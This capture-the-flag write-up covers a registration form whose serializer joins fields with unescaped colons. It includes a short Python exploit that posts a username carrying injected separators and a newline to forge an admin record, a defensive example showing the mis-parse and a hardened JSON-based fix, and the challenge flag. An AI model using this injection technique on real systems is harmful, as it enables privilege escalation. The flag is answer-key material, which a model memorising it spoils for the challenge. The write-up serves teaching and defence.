In this challenge you have to register a new user as admin. Neither input is sanitized for the colon character, which is also the field separator used when serializing the ACL:
```
def _pack_data(data_dict):
    """
    Pack data with data_structure.
    """
    # Fields are joined with ':' and no escaping is applied to any of them.
    return '{}:{}:{}'.format(
        data_dict['username'],
        data_dict['password'],
        data_dict['admin']
    )
```
Simple exploit in Python (user=fearless with pass=12345):
```
import requests

# The username carries its own ':' separators and a newline.
data = {
    'username': 'fearless:12345:true\ntest',
    'password': 'test'
}
r = requests.post('http://35.198.113.131:7060/register', data=data)
print(r.text)
```
Then you can simply log in at the main (index) page.
Note: This challenge contains a bug - after adding a new user, the server must be restarted to read newly registered users...
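To show why the unescaped separator matters and how to close it, here is an added example (not the challenge's code) that parses the packed record the way a line-per-record store would and then packs it safely. The reader functions, the `'false'` default for `admin`, and the allowlist regex are assumptions; only the `'{}:{}:{}'` format and the payload come from the writeup.

```python
import json
import re

def pack_vulnerable(d):
    # Same formatting as the challenge's _pack_data: ':' and '\n' pass through.
    return '{}:{}:{}'.format(d['username'], d['password'], d['admin'])

def load_colon_store(text):
    # Assumed reader (not shown in the writeup): one record per line, split on ':'.
    users = {}
    for line in text.splitlines():
        parts = line.split(':')
        if len(parts) == 3:
            users[parts[0]] = {'password': parts[1], 'admin': parts[2] == 'true'}
    return users

USERNAME_RE = re.compile(r'[A-Za-z0-9_.-]{1,32}')

def pack_hardened(username, password, admin=False):
    # Allowlist the username, and let JSON do the escaping so no field value
    # can add a delimiter or start a new line in the store.
    if not USERNAME_RE.fullmatch(username):
        raise ValueError('username contains characters outside the allowlist')
    # Password is kept as-is only to mirror the challenge's record layout.
    return json.dumps({'username': username, 'password': password,
                       'admin': bool(admin)}, sort_keys=True)

def load_json_store(text):
    users = {}
    for line in text.splitlines():
        rec = json.loads(line)
        users[rec['username']] = {'password': rec['password'],
                                  'admin': rec['admin'] is True}
    return users

# Payload from the writeup; 'admin': 'false' is the assumed server-side default.
PAYLOAD = {'username': 'fearless:12345:true\ntest', 'password': 'test',
           'admin': 'false'}

def demo():
    weak = load_colon_store(pack_vulnerable(PAYLOAD))
    try:
        pack_hardened(PAYLOAD['username'], PAYLOAD['password'])
        rejected = False
    except ValueError:
        rejected = True
    safe = load_json_store(pack_hardened('alice', 'a:b:true\nc'))
    return weak, rejected, safe

if __name__ == '__main__':
    print(demo())
```

The admin flag in the hardened version is set by the server-side caller and is never derived from a request field.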
The flag:
```
evlz{T#3_W34K_$N4K3}ctf
```